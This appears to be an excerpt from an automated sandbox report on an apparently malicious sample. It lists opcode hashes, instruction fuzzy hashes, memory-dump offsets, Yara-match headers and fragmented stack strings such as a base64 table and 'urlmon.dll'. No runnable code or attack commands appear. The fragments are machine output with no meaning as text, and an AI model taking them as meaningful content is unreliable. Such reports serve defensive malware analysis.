                                                        • Instruction ID: c70b0b42425cebd695a5cb2a94f2357b568820fe33c82708512fb5b9300cb76b
                                                        • Opcode Fuzzy Hash: 921b030c230440de0726696820ca5261c4a634c9c5d71502a68629f0eb4e272c
                                                        • Instruction Fuzzy Hash: 49E08637A4072437D630A699AC05FD7B7ACCBC5E60F190264FE1CAB341E961AA0047E5
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 878f29f21cbc96dad10bd07106ed5d6cf7f2163ab25b73c8c5ea1bea0e2e3775
                                                        • Instruction ID: f88a566441ba6473b0dd70cdb3a8b8751a1a44722df0778b98a190e80aa5ac21
                                                        • Opcode Fuzzy Hash: 878f29f21cbc96dad10bd07106ed5d6cf7f2163ab25b73c8c5ea1bea0e2e3775
                                                        • Instruction Fuzzy Hash: 9BF06D71815108AADB14CFA4E881BDEBB78EB48360F2083A9E819DB280D63697548B45
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b1cb065eba1c73ab1a9b1477b108b4dbb8e94e6f74e916b0cd078851467634e0
                                                        • Instruction ID: 2393250ba57afa9caf7e1a34d9c6493e62357f8f9742f3642e26e7e6c878bdd1
                                                        • Opcode Fuzzy Hash: b1cb065eba1c73ab1a9b1477b108b4dbb8e94e6f74e916b0cd078851467634e0
                                                        • Instruction Fuzzy Hash: A1E0C2ABE0132867C321E2A89C45DEFB24C9B42294F001392FD05EA150FE604F8042E6
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: de80a8ed71822f980c586ba2ccbcacc3d85843b4b81fd9b74fa0ebae53fbcab3
                                                        • Instruction ID: 84e712c232649b08116e99fea91d2eb14d942951a8bdf583374485fbc2108e68
                                                        • Opcode Fuzzy Hash: de80a8ed71822f980c586ba2ccbcacc3d85843b4b81fd9b74fa0ebae53fbcab3
                                                        • Instruction Fuzzy Hash: CBE046762417047BC620EA59DC41EABB7ACDBC6620F408515FA09AB241D671B91187F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                        • API String ID: 0-3248090998
                                                        • Opcode ID: b9e5217d184e9b5f9a88de9e7237c2e2f9394286185c393cc3eef6ccabdc4c49
                                                        • Instruction ID: c9dd22679fb36fcfdae8e6851ff139811813cc4e099b461db3f6a7f3b7cf8681
                                                        • Opcode Fuzzy Hash: b9e5217d184e9b5f9a88de9e7237c2e2f9394286185c393cc3eef6ccabdc4c49
                                                        • Instruction Fuzzy Hash: DC91F1F09052A98ACB118F55A5603DFBF71BB85304F1581E9C6AA7B243C3BE4E46DF90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                        • API String ID: 0-1002149817
                                                        • Opcode ID: b272e7f409098d0706e8b54b569d1d643d80dbdf23682bb1186596416bd5f9bc
                                                        • Instruction ID: 76fc40156078b8fc9158937ccba0b6a0e92e38d4985edf44d65e747a06dfaf02
                                                        • Opcode Fuzzy Hash: b272e7f409098d0706e8b54b569d1d643d80dbdf23682bb1186596416bd5f9bc
                                                        • Instruction Fuzzy Hash: F2C12DB1C013689EDB60DFA4CC44BEEBBB9AF45304F0051D9E548BB241E7B55A88CFA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                        • API String ID: 0-3236418099
                                                        • Opcode ID: 39dd5d9c397d86ea66d3dbff00dc7e0abce556c7e1ac0d202d1190dae7aa9199
                                                        • Instruction ID: a9bfb88ac6fe03c73f05b23bb39fcecf9a30bcf5073b99a0de7fe67484997566
                                                        • Opcode Fuzzy Hash: 39dd5d9c397d86ea66d3dbff00dc7e0abce556c7e1ac0d202d1190dae7aa9199
                                                        • Instruction Fuzzy Hash: 4D9140B5901318AEEB20DFA4DC44FEEB7BDEF45304F0052A9E90CAA140EB755B458FA5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "E$+'$/N$0Y$1$^$^$kF$lS$n$q5$s$s3$sA$x$}
                                                        • API String ID: 0-2272718305
                                                        • Opcode ID: 119895b5784794660d04c4046bcd016ced32261a17f538e045d697261d4a457a
                                                        • Instruction ID: bb81b6b56b104d9e5d911d8b30494cd4c98b4c71905d223ad733b805ae439c84
                                                        • Opcode Fuzzy Hash: 119895b5784794660d04c4046bcd016ced32261a17f538e045d697261d4a457a
                                                        • Instruction Fuzzy Hash: 2D511FB0D05769CBEB60CF91C9587DEBBB1BB05308F20819DC1593B281D7BA1A89CF95
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "E$+'$/N$0Y$1$^$^$kF$lS$n$q5$s$s3$sA$x$}
                                                        • API String ID: 0-2272718305
                                                        • Opcode ID: 086a905ddda2fda45dbf3a1f70f2982aa3052b21ea49fb8dfdb216fb9fcc469f
                                                        • Instruction ID: e9f44b7267d894dafc0f6ba87eea1043c20104cda5c37bcb1c008f180d5decff
                                                        • Opcode Fuzzy Hash: 086a905ddda2fda45dbf3a1f70f2982aa3052b21ea49fb8dfdb216fb9fcc469f
                                                        • Instruction Fuzzy Hash: 99512EB0C05769CBEB60CF91C9587DEBBB1BB05308F20818DC1593B281D7BA1A89CF95
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                        • API String ID: 0-392141074
                                                        • Opcode ID: 5252413ce4bcb23e20e6f4736f039d3f73933e7686b5955067a4e93598df19fa
                                                        • Instruction ID: 9bc086a6a7ad20643180227e16fbcbcdb9342855516352b89742f6772ca14a62
                                                        • Opcode Fuzzy Hash: 5252413ce4bcb23e20e6f4736f039d3f73933e7686b5955067a4e93598df19fa
                                                        • Instruction Fuzzy Hash: 777110B5C10318ABDB65DFA4CC40FDEB77DAF48704F009299E519AA141EB725788CFA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                        • API String ID: 0-392141074
                                                        • Opcode ID: 0bf1a97aaa8363c0ef7852bc004ad7f0c88a176eccf12c431c4d5ed8c9311925
                                                        • Instruction ID: 2941ef3c69a538f31665fc3ff78af885012e1f0f9ffee9437485ca261d8b6877
                                                        • Opcode Fuzzy Hash: 0bf1a97aaa8363c0ef7852bc004ad7f0c88a176eccf12c431c4d5ed8c9311925
                                                        • Instruction Fuzzy Hash: 59611DB5C10318AADB65DFA4CC40FDEB77DBF48704F008299E519AA180EB725788CFA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                        • API String ID: 0-392141074
                                                        • Opcode ID: 398c9292f9e28510272aeedd6729d4a6b875da0ffcde4c2c55355511c461f371
                                                        • Instruction ID: 83cdc367ffef91139da057940f4417cca7a4a02a95312fb4d58d4cf624a5b615
                                                        • Opcode Fuzzy Hash: 398c9292f9e28510272aeedd6729d4a6b875da0ffcde4c2c55355511c461f371
                                                        • Instruction Fuzzy Hash: 0C611DB5C00318AADB65DFA4CC80FDEB77DBF48704F009299E519AA141EB765788CFA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                        • API String ID: 0-685823316
                                                        • Opcode ID: 6fb5c99784bfd45368b5b5cc851fdee953470dd05ea812544702cb9c47ac604f
                                                        • Instruction ID: 7595121e317ab5b6ba8f41426d1aa5dbf3fccd024dc4c4090b3f9739ea70a982
                                                        • Opcode Fuzzy Hash: 6fb5c99784bfd45368b5b5cc851fdee953470dd05ea812544702cb9c47ac604f
                                                        • Instruction Fuzzy Hash: 0C31C8B5D00318AADF54DFA0CC45BEEB7B9AF48304F00825CFA18BA180DBB516488BA4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: :$:$:$A$I$N$P$m$s$t
                                                        • API String ID: 0-2304485323
                                                        • Opcode ID: fdfffd99ba25e9dbac55ab6f15115227f78aabde3d04b42b215951cfe4fad7bb
                                                        • Instruction ID: d0ed6964e9af3a523892fe61dae30f182f0e68ef2dec75d37839c6c32c923ba6
                                                        • Opcode Fuzzy Hash: fdfffd99ba25e9dbac55ab6f15115227f78aabde3d04b42b215951cfe4fad7bb
                                                        • Instruction Fuzzy Hash: 56D1BAB6900305AFDB14DBA4CD41BEEB7B9AF98300F04561DF515EB240EB79AA05CBA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: :$:$:$A$I$N$P$m$s$t
                                                        • API String ID: 0-2304485323
                                                        • Opcode ID: 13a227710854c3f32e156899929a147c2a639a301993a12d7d4478ed7aa6c1d6
                                                        • Instruction ID: ffa18f9e5c2a60fe85e23ce74fcfa25b98a865c32d23e029b769db59d8ceff97
                                                        • Opcode Fuzzy Hash: 13a227710854c3f32e156899929a147c2a639a301993a12d7d4478ed7aa6c1d6
                                                        • Instruction Fuzzy Hash: 4A81E9B5900308AFDB10DFA4CD41BEEB7B9AF58300F04561DF519EB240EB75AA05CBA5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .$P$e$i$m$o$r$x
                                                        • API String ID: 0-620024284
                                                        • Opcode ID: 7989cdc732e5899902857284ee77f3e8438040161ec2e2a2a77ea5aeb2a7051c
                                                        • Instruction ID: fcbc61c76ed2f4392ba562f56c629d9e230d18d3f0d9faf7269f1a508f9a3b09
                                                        • Opcode Fuzzy Hash: 7989cdc732e5899902857284ee77f3e8438040161ec2e2a2a77ea5aeb2a7051c
                                                        • Instruction Fuzzy Hash: 2D5184B5800318BADB25EBA49C40FDB777DAF99300F00939DB948AA141EA7597488FB1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: L$S$\$a$c$e$l
                                                        • API String ID: 0-3322591375
                                                        • Opcode ID: c87cfb4b75d59bb9f6269d364374cb13d1c2d13729a927474ec93afe3ec8bb73
                                                        • Instruction ID: 2877e833fe107a6f21b4df57a6a496473a7737d5640b840bdf07d0f744665d60
                                                        • Opcode Fuzzy Hash: c87cfb4b75d59bb9f6269d364374cb13d1c2d13729a927474ec93afe3ec8bb73
                                                        • Instruction Fuzzy Hash: B34153B6C10218AADF20DFA4DC84BEEB7F9FF48314F45525AED19AB100E7715A458BA0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: F$P$T$f$r$x
                                                        • API String ID: 0-2523166886
                                                        • Opcode ID: 7d3ac8791898e1ac3559358f7e28aa2db85787ba6202871b13cf28e606fefc66
                                                        • Instruction ID: e6dbe325d440f8f16b4734781ae331a10ed6412541fe9695a232cc5b633e2714
                                                        • Opcode Fuzzy Hash: 7d3ac8791898e1ac3559358f7e28aa2db85787ba6202871b13cf28e606fefc66
                                                        • Instruction Fuzzy Hash: 2551C371900305EAE734DFA9DC44BEBB7B8FF89704F045759A8185B180E7B5AA44CBA2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $i$l$o$u
                                                        • API String ID: 0-2051669658
                                                        • Opcode ID: f3697019f948a7c46fbf51130d62a80f43842c3f5b3c1b4ab9ba8c77e6fbfa6f
                                                        • Instruction ID: 43991a87a04cc081f9d3c3ce9570ce15c4cea3c091ce7efdc6eaf09e0987e238
                                                        • Opcode Fuzzy Hash: f3697019f948a7c46fbf51130d62a80f43842c3f5b3c1b4ab9ba8c77e6fbfa6f
                                                        • Instruction Fuzzy Hash: EC614EB1900304AFDB24DBA4DC80FEFB7FDBB88714F144659E519A7240E735AA458BA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: *1$?u94$?u94*1$W(aj$aj)Q
                                                        • API String ID: 0-1735100797
                                                        • String ID: $e$k$o
                                                        • API String ID: 0-3624523832
                                                        • String ID: $e$h$o
                                                        • API String ID: 0-3662636641
                                                        • String ID: $e$k$o
                                                        • API String ID: 0-3624523832
                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                        • API String ID: 0-2877786613
                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                        • API String ID: 0-2877786613
                                                        • String ID: -$3$3$c
                                                        • API String ID: 0-1704243376
                                                        • String ID: $!$4$J
                                                        • API String ID: 0-1503566715